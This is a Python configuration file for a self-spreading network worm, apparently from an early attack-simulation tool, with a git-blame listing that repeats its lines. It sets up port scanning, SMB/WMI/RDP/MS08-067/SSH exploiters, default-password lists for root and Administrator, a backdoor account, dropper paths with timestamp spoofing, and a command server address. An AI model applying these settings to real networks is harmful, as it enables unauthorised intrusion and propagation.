monkey/chaos_monkey/config.py

import os
import sys
from network.range import FixedRange
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger
from abc import ABCMeta
import uuid
import types

__author__ = 'itamar'

GUID = str(uuid.getnode())

EXTERNAL_CONFIG_FILE = os.path.join(os.path.dirname(sys.argv[0]), 'monkey.bin')


def _cast_by_example(value, example):
    example_type = type(example)
    if example_type is str:
        return str(os.path.expandvars(value))
    elif example_type is tuple and len(example) != 0:
        return tuple([_cast_by_example(x, example[0]) for x in value])
    elif example_type is list and len(example) != 0:
        return [_cast_by_example(x, example[0]) for x in value]
    elif example_type is type(value):
        return value
    elif example_type is bool:
        return value.lower() == 'true'
    elif example_type is int:
        return int(value)
    elif example_type is float:
        return float(value)
    elif example_type is types.ClassType or example_type is ABCMeta:
        return globals()[value]
    else:
        return None


class Configuration(object):

    def from_dict(self, data):
        for key, value in data.items():
            if key.startswith('_'):
                continue

            try:
                default_value = getattr(Configuration, key)
            except AttributeError:
                raise
            
            setattr(self, key, _cast_by_example(value, default_value))

    def as_dict(self):
        result = {}
        for key in dir(Configuration):
            if key.startswith('_'):
                continue
            try:
                value = getattr(self, key)
            except AttributeError:
                continue

            val_type = type(value)

            if val_type is types.FunctionType or val_type is types.MethodType:
                continue

            if val_type is types.ClassType or val_type is ABCMeta:
                value = value.__name__
            elif val_type is tuple or val_type is list:
                if len(value) != 0 and type(value[0]) is types.ClassType or type(value[0]) is ABCMeta:
                    value = val_type([x.__name__ for x in value])

            result[key] = value

        return result

    ###########################
    ### logging config
    ###########################

    use_file_logging = True
    dropper_log_path = os.path.expandvars("%temp%\~df1562.tmp") if sys.platform == "win32" else '/tmp/user-1562'
    monkey_log_path = os.path.expandvars("%temp%\~df1563.tmp") if sys.platform == "win32" else '/tmp/user-1563'

    ###########################
    ### dropper config
    ###########################

    dropper_try_move_first = sys.argv[0].endswith(".exe")
    dropper_set_date = True
    dropper_date_reference_path = r"\windows\system32\kernel32.dll" if sys.platform == "win32" else '/bin/sh'
    dropper_target_path = r"C:\Windows\monkey.exe"
    dropper_target_path_linux = '/bin/monkey'

    ###########################
    ### monkey config
    ###########################

    alive = True

    self_delete_in_cleanup = False

    singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"

    # how long to wait between scan iterations
    timeout_between_iterations = 300

    # how many scan iterations to perform on each run
    max_iterations = 3

    scanner_class = TcpScanner
    finger_classes = (SMBFinger, SSHFinger, PingScanner)
    exploiter_classes = (SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, SSHExploiter)

    # how many victims to look for in a single scan iteration
    victims_max_find = 14

    # how many victims to exploit before stopping
    victims_max_exploit = 7

    current_server = ""

    command_servers = ["russian-mail-brides.com:5000"]

    serialize_config = False

    retry_failed_explotation = True

    ###########################
    ### scanners config
    ###########################


    #range_class = RelativeRange
    range_size = 8
    range_class = FixedRange
    range_fixed = ("10.0.1.39", )

    # TCP Scanner
    tcp_target_ports = [22, 2222, 445, 135, 3389]
    tcp_scan_timeout = 3000 # 3000 Milliseconds
    tcp_scan_interval = 200
    tcp_scan_get_banner = True

    # Ping Scanner
    ping_scan_timeout = 1000

    ###########################
    ### exploiters config
    ###########################

    skip_exploit_if_file_exist = True

    ms08_067_exploit_attempts = 5
    ms08_067_remote_user_add = "IUSER_SUPPORT"
    ms08_067_remote_user_pass = "Password1!"

    # psexec exploiter
    psexec_user = "Administrator"
    psexec_passwords = ["Password1!", "1234", "password", "12345678"]

    #ssh exploiter
    ssh_user = "root"
    ssh_passwords = ["root", "toor", "1234", "12345678"]

    #rdp exploiter
    rdp_use_vbs_download = True

WormConfiguration = Configuration()
first commit 2015-08-30 15:27:35 +08:00			`import os`
			`import sys`
code organization 2015-11-30 16:56:20 +08:00			`from network.range import FixedRange`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter`
			`from network import TcpScanner, PingScanner, SMBFinger, SSHFinger`
			`from abc import ABCMeta`
			`import uuid`
			`import types`
code organization 2015-11-30 16:56:20 +08:00
first commit 2015-08-30 15:27:35 +08:00			`__author__ = 'itamar'`

add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`GUID = str(uuid.getnode())`

			`EXTERNAL_CONFIG_FILE = os.path.join(os.path.dirname(sys.argv[0]), 'monkey.bin')`

configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`def _cast_by_example(value, example):`
			`example_type = type(example)`
			`if example_type is str:`
			`return str(os.path.expandvars(value))`
			`elif example_type is tuple and len(example) != 0:`
			`return tuple([_cast_by_example(x, example[0]) for x in value])`
			`elif example_type is list and len(example) != 0:`
			`return [_cast_by_example(x, example[0]) for x in value]`
			`elif example_type is type(value):`
			`return value`
			`elif example_type is bool:`
			`return value.lower() == 'true'`
			`elif example_type is int:`
			`return int(value)`
			`elif example_type is float:`
			`return float(value)`
			`elif example_type is types.ClassType or example_type is ABCMeta:`
			`return globals()[value]`
			`else:`
			`return None`

configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`class Configuration(object):`

			`def from_dict(self, data):`
configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`for key, value in data.items():`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`if key.startswith('_'):`
			`continue`

			`try:`
			`default_value = getattr(Configuration, key)`
			`except AttributeError:`
configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`raise`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00
			`setattr(self, key, _cast_by_example(value, default_value))`

			`def as_dict(self):`
			`result = {}`
			`for key in dir(Configuration):`
			`if key.startswith('_'):`
			`continue`
			`try:`
			`value = getattr(self, key)`
			`except AttributeError:`
			`continue`

			`val_type = type(value)`

			`if val_type is types.FunctionType or val_type is types.MethodType:`
			`continue`

			`if val_type is types.ClassType or val_type is ABCMeta:`
			`value = value.__name__`
			`elif val_type is tuple or val_type is list:`
			`if len(value) != 0 and type(value[0]) is types.ClassType or type(value[0]) is ABCMeta:`
			`value = val_type([x.__name__ for x in value])`

			`result[key] = value`

			`return result`

first commit 2015-08-30 15:27:35 +08:00			`###########################`
			`### logging config`
code organization 2015-11-30 16:56:20 +08:00			`###########################`
first commit 2015-08-30 15:27:35 +08:00
			`use_file_logging = True`
configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`dropper_log_path = os.path.expandvars("%temp%\~df1562.tmp") if sys.platform == "win32" else '/tmp/user-1562'`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`monkey_log_path = os.path.expandvars("%temp%\~df1563.tmp") if sys.platform == "win32" else '/tmp/user-1563'`
first commit 2015-08-30 15:27:35 +08:00
			`###########################`
			`### dropper config`
			`###########################`

			`dropper_try_move_first = sys.argv[0].endswith(".exe")`
			`dropper_set_date = True`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`dropper_date_reference_path = r"\windows\system32\kernel32.dll" if sys.platform == "win32" else '/bin/sh'`
			`dropper_target_path = r"C:\Windows\monkey.exe"`
			`dropper_target_path_linux = '/bin/monkey'`
first commit 2015-08-30 15:27:35 +08:00
			`###########################`
			`### monkey config`
			`###########################`

minor bug fix 2015-09-30 20:05:30 +08:00			`alive = True`

configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`self_delete_in_cleanup = False`
added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00
first commit 2015-08-30 15:27:35 +08:00			`singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"`

			`# how long to wait between scan iterations`
added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00			`timeout_between_iterations = 300`
first commit 2015-08-30 15:27:35 +08:00
			`# how many scan iterations to perform on each run`
- minor bug fixes 2015-10-08 18:30:36 +08:00			`max_iterations = 3`
first commit 2015-08-30 15:27:35 +08:00
			`scanner_class = TcpScanner`
added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00			`finger_classes = (SMBFinger, SSHFinger, PingScanner)`
			`exploiter_classes = (SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, SSHExploiter)`
first commit 2015-08-30 15:27:35 +08:00
			`# how many victims to look for in a single scan iteration`
			`victims_max_find = 14`

			`# how many victims to exploit before stopping`
			`victims_max_exploit = 7`

add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`current_server = ""`

			`command_servers = ["russian-mail-brides.com:5000"]`

added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00			`serialize_config = False`

			`retry_failed_explotation = True`
first commit 2015-08-30 15:27:35 +08:00
			`###########################`
			`### scanners config`
			`###########################`


			`#range_class = RelativeRange`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`range_size = 8`
minor bug fix 2015-09-30 20:05:30 +08:00			`range_class = FixedRange`
configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`range_fixed = ("10.0.1.39", )`
first commit 2015-08-30 15:27:35 +08:00
			`# TCP Scanner`
added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00			`tcp_target_ports = [22, 2222, 445, 135, 3389]`
- minor bug fixes 2015-10-08 18:30:36 +08:00			`tcp_scan_timeout = 3000 # 3000 Milliseconds`
first commit 2015-08-30 15:27:35 +08:00			`tcp_scan_interval = 200`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00			`tcp_scan_get_banner = True`
first commit 2015-08-30 15:27:35 +08:00
			`# Ping Scanner`
			`ping_scan_timeout = 1000`

			`###########################`
			`### exploiters config`
			`###########################`

			`skip_exploit_if_file_exist = True`

			`ms08_067_exploit_attempts = 5`
			`ms08_067_remote_user_add = "IUSER_SUPPORT"`
			`ms08_067_remote_user_pass = "Password1!"`

			`# psexec exploiter`
			`psexec_user = "Administrator"`
configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`psexec_passwords = ["Password1!", "1234", "password", "12345678"]`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00
			`#ssh exploiter`
			`ssh_user = "root"`
			`ssh_passwords = ["root", "toor", "1234", "12345678"]`

minor bug fix 2015-09-30 20:05:30 +08:00			`#rdp exploiter`
			`rdp_use_vbs_download = True`
add support for simple fingerprinting by: ping, smb, ssh and open ports 2015-09-29 22:55:54 +08:00
configuration print and meaningless spaces fixes 2015-11-26 21:48:47 +08:00			`WormConfiguration = Configuration()`